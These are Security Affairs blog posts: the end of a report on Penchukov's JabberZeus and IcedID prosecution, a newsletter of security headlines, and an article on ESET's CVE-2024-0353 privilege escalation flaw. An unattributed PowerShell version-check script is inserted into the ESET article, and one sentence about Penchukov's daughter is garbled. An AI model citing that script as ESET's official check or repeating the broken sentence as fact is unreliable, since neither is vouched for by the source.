In 2012, the Ukrainian national Vyacheslav Igorevich Penchukov was accused of being a member of a cybercrime gang known as the JabberZeus crew. JabberZeus was a small cybercriminal ring that targeted SMBs with a custom-made version of the Zeus banking trojan. At the time, DoJ accused Penchukov of coordinating the exchange of stolen banking credentials and money mules and of receiving alerts once a bank account had been compromised.

The popular investigator Brian Krebs reported that Gary Warner, director of research in computer forensics at the University of Alabama at Birmingham, noted in 2014 that Tank told co-conspirators in a JabberZeus chat on July 22, 2009 that his daughter, Miloslava, was and told him Miloslava birth weight.

Warner explained that Tank was identified by searching Ukrainian birth records for the only girl named Miloslava born on that day with a specific birth weight.

Krebs pointed out that Penchukov was able to evade prosecution by Ukrainian authorities for many years due to his political connections. The late son of former Ukrainian President Victor Yanukovych would serve as godfather to Tank’s daughter Miloslava.

Two other members of the gang, Yevhen Kulibaba and Yuriy Konovalenko, were arrested in 2014 and pleaded guilty. Both were sentenced in May 2015 to two years and ten months of incarceration, followed by one year of supervised release.

Since May 2019, Penchukov had a prominent role in the Zeus operation. From at least November 2018 through February 2021, Penchukov helped lead a conspiracy that infected victim computers with IcedID or Bokbot.

Penchukov faces up to 20 years in prison for each count; he is scheduled to be sentenced on May 9.


Pierluigi Paganini

(SecurityAffairs – hacking, IcedID Malware)

Security Affairs newsletter Round 459 by Pierluigi Paganini – INTERNATIONAL EDITION

18 February 2024 at 14:21

A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs are free for you in your email box.

Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press.

Ukrainian national faces up to 20 years in prison for his role in Zeus, IcedID malware schemes
CISA: Cisco ASA/FTD bug CVE-2020-3259 exploited in ransomware attacks
CISA adds Microsoft Exchange and Cisco ASA and FTD bugs to its Known Exploited Vulnerabilities catalog
US gov offers a reward of up to $10M for info on ALPHV/Blackcat gang leaders
U.S. CISA: hackers breached a state government organization
Russia-linked Turla APT uses new TinyTurla-NG backdoor to spy on Polish NGOs
US Gov dismantled the Moobot botnet controlled by Russia-linked APT28
A cyberattack halted operations at Varta production plants
North Korea-linked actors breached the emails of a Presidential Office member
Nation-state actors are using AI services and LLMs for cyberattacks
Abusing the Ubuntu ‘command-not-found’ utility to install malicious packages
Zoom fixed critical flaw CVE-2024-24691 in Windows software
Adobe Patch Tuesday fixed critical vulnerabilities in Magento, Acrobat and Reader
Microsoft Patch Tuesday for February 2024 fixed 2 actively exploited 0-days
A ransomware attack took 100 Romanian hospitals down
Bank of America customer data compromised after a third-party services provider data breach
Ransomfeed – Third Quarter Report 2023 is out!
Global Malicious Activity Targeting Elections is Skyrocketing
Researchers released a free decryption tool for the Rhysida Ransomware
Residential Proxies vs. Datacenter Proxies: Choosing the Right Option
CISA adds Roundcube Webmail Persistent XSS bug to its Known Exploited Vulnerabilities catalog
Canada Gov plans to ban the Flipper Zero to curb car thefts
ExpressVPN leaked DNS requests due to a bug in the split tunneling feature
9 Possible Ways Hackers Can Use Public Wi-Fi to Steal Your Sensitive Data
US Feds arrested two men involved in the Warzone RAT operation
Raspberry Robin spotted using two new 1-day LPE exploits

Cybercrime

International Cybercrime Malware Service Dismantled by Federal Authorities: Key Malware Sales and Support Actors in Malta and Nigeria Charged in Federal Indictments  

As-a-Service tools empower criminals with limited tech skills 

Ransomware Attack Takes 100 Hospitals Offline 

Reward for Information: ALPHV/Blackcat Ransomware as a Service

Foreign National Pleads Guilty to Role in Cybercrime Schemes Involving Tens of Millions of Dollars in Losses      

Malware

RASPBERRY ROBIN KEEPS RIDING THE WAVE OF ENDLESS 1-DAYS

A Method for Decrypting Data Infected with Rhysida Ransomware  

Bypassing EDRs With EDR-Preloading  

Justice Department Conducts Court-Authorized Disruption of Botnet Controlled by the Russian Federation’s Main Intelligence Directorate of the General Staff (GRU)

Face Off  

Hacking

Snap Trap: The Hidden Dangers Within Ubuntu’s Package Suggestion System

Disrupting malicious uses of AI by state-affiliated threat actors      

CISA and MS-ISAC Release Advisory on Compromised Account Used to Access State Government Organization

Ivanti Pulse Secure Found Using 11-Year-Old Linux Version and Outdated Libraries

Intelligence and Information Warfare 

Global Malicious Activity Targeting Elections Is Skyrocketing  

Staying ahead of threat actors in the age of AI  

US needs to take China’s cyber-threat to US infrastructure more seriously 

South Korea says presumed North Korean hackers breached personal emails of presidential staffer  

TinyTurla Next Generation – Turla APT spies on Polish NGOs  

Cybersecurity

Building a Data Fortress: Data Security and Privacy in the Age of Generative AI and LLMs

Package Theft Statistics  

After a tip, ExpressVPN acts swiftly to protect customers  

Canada to ban the Flipper Zero to stop surge in car thefts

I’m a cyber expert, these are the five things you need to do to ‘digitally break up’ with someone in the age of login sharing  

THE FEBRUARY 2024 SECURITY UPDATE REVIEW  

Fertility tracker Glow fixes bug that exposed users’ personal data

European Court of Human Rights declares backdoored encryption is illegal


Pierluigi Paganini

(SecurityAffairs – hacking, newsletter)

ESET fixed high-severity local privilege escalation bug in Windows products

18 February 2024 at 15:38

Cybersecurity firm ESET has addressed a high-severity elevation of privilege vulnerability in its Windows security solution.

ESET addressed a high-severity vulnerability, tracked as CVE-2024-0353 (CVSS score 7.8), in its Windows products.

The vulnerability is a local privilege escalation issue that was submitted to the company by the Zero Day Initiative (ZDI). According to the advisory, an attacker can misuse ESET’s file operations, as performed by the Real-time file system protection, to delete files without having the proper permission.

“The vulnerability in file operations handling, performed by the Real-time file system protection feature on the Windows operating system, potentially allowed an attacker with an ability to execute low-privileged code on the target system to delete arbitrary files as NT AUTHORITY\SYSTEM, escalating their privileges.” reads the advisory.

ESET is not aware of attacks in the wild exploiting this vulnerability.

Below is the list of impacted programs and versions:

  • ESET NOD32 Antivirus, Internet Security, Smart Security Premium, Security Ultimate 16.2.15.0 and earlier
  • ESET Endpoint Antivirus for Windows and Endpoint Security for Windows 10.1.2058.0, 10.0.2049.0, 9.1.2066.0, 8.1.2052.0 and earlier from the respective version family
  • ESET Server Security for Windows Server (formerly File Security for Microsoft Windows Server) 10.0.12014.0, 9.0.12018.0, 8.0.12015.0, 7.3.12011.0 and earlier from the respective version family
  • ESET Mail Security for Microsoft Exchange Server 10.1.10010.0, 10.0.10017.0, 9.0.10011.0, 8.0.10022.0, 7.3.10014.0 and earlier from the respective version family
  • ESET Mail Security for IBM Domino 10.0.14006.0, 9.0.14007.0, 8.0.14010.0, 7.3.14004.0 and earlier from the respective version family
  • ESET Security for Microsoft SharePoint Server 10.0.15004.0, 9.0.15005.0, 8.0.15011.0, 7.3.15004.0 and earlier from the respective version family
  • ESET File Security for Microsoft Azure (all versions)

The cybersecurity firm has released patches to address the issue in NOD32 Antivirus, Internet Security, Smart Security Premium, Security Ultimate, Endpoint Antivirus and Endpoint Security for Windows, Server Security for Windows Server, Mail Security for Exchange Server and IBM Domino, Security for SharePoint Server, and File Security for Microsoft Azure.

The security firm hasn’t provided security patches for products that reached their end-of-life (EoL) status.

The company recommended customers patch their products as soon as possible.
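A quick way for administrators to confirm whether an endpoint still runs an affected build is to compare the installed ESET product version against the version ceilings listed above. The script below is an added example, not ESET's or the article's own code; it assumes ESET products appear under the standard Windows Uninstall registry keys with a DisplayName starting with "ESET" and a parseable DisplayVersion.

```powershell
# Added example (not ESET's or the article's code): flag installed ESET Windows products
# at or below the last vulnerable build for CVE-2024-0353, using the advisory's ceilings.
# Assumption: products register under the Uninstall keys with DisplayName "ESET ..." .
$Rules = @(
    # Home products: one ceiling, "16.2.15.0 and earlier" (not scoped to a version family)
    @{ Pattern = 'NOD32 Antivirus|Internet Security|Smart Security Premium|Security Ultimate'
       Ceilings = @('16.2.15.0'); PerFamily = $false }
    # Business products: "and earlier from the respective version family" (major.minor)
    @{ Pattern = 'Endpoint Antivirus|Endpoint Security'
       Ceilings = @('10.1.2058.0','10.0.2049.0','9.1.2066.0','8.1.2052.0'); PerFamily = $true }
    @{ Pattern = 'Server Security|File Security for Microsoft Windows Server'
       Ceilings = @('10.0.12014.0','9.0.12018.0','8.0.12015.0','7.3.12011.0'); PerFamily = $true }
    @{ Pattern = 'Mail Security for Microsoft Exchange'
       Ceilings = @('10.1.10010.0','10.0.10017.0','9.0.10011.0','8.0.10022.0','7.3.10014.0'); PerFamily = $true }
    @{ Pattern = 'Mail Security for IBM Domino'
       Ceilings = @('10.0.14006.0','9.0.14007.0','8.0.14010.0','7.3.14004.0'); PerFamily = $true }
    @{ Pattern = 'Security for Microsoft SharePoint'
       Ceilings = @('10.0.15004.0','9.0.15005.0','8.0.15011.0','7.3.15004.0'); PerFamily = $true }
    # File Security for Microsoft Azure: the advisory lists all versions as affected
    @{ Pattern = 'File Security for Microsoft Azure'; Ceilings = @(); PerFamily = $false }
)

function Test-EsetCve20240353 {
    param([string]$DisplayName, [version]$Installed)
    foreach ($rule in $Rules) {
        if ($DisplayName -notmatch $rule.Pattern) { continue }
        if ($rule.Ceilings.Count -eq 0) { return 'Affected (all versions)' }
        foreach ($c in $rule.Ceilings) {
            $ceiling = [version]$c
            $sameFamily = ($Installed.Major -eq $ceiling.Major -and $Installed.Minor -eq $ceiling.Minor)
            if (-not $rule.PerFamily -or $sameFamily) {
                if ($Installed -le $ceiling) { return 'Affected' } else { return 'Patched' }
            }
        }
        # A family the advisory does not list is either newer than it or EoL (no patch offered)
        return 'Unlisted family: verify support/EoL status'
    }
    return 'Not an affected product'
}

$UninstallKeys = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*',
                 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*'
Get-ItemProperty -Path $UninstallKeys -ErrorAction SilentlyContinue |
    Where-Object { $_.DisplayName -like 'ESET*' -and ($_.DisplayVersion -as [version]) } |
    ForEach-Object {
        $v = $_.DisplayVersion -as [version]
        [pscustomobject]@{ Product = $_.DisplayName; Version = $v
                           Status  = Test-EsetCve20240353 -DisplayName $_.DisplayName -Installed $v }
    } | Format-Table -AutoSize
```

Run it in an elevated PowerShell session on each endpoint, or wrap it in your management tooling; an "Unlisted family" result for a business product older than the listed families points at an EoL build that will not receive a fix.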

Vulnerabilities in security solutions are particularly dangerous because they are difficult to detect and because such software runs with high privileges.

In December 2023, the cybersecurity firm addressed a vulnerability (CVE-2023-5594, CVSS score 7.5) in the Secure Traffic Scanning Feature, preventing potential exploitation that could lead web browsers to trust websites using certificates signed with outdated and insecure algorithms.


Pierluigi Paganini

(SecurityAffairs – hacking, privilege escalation)
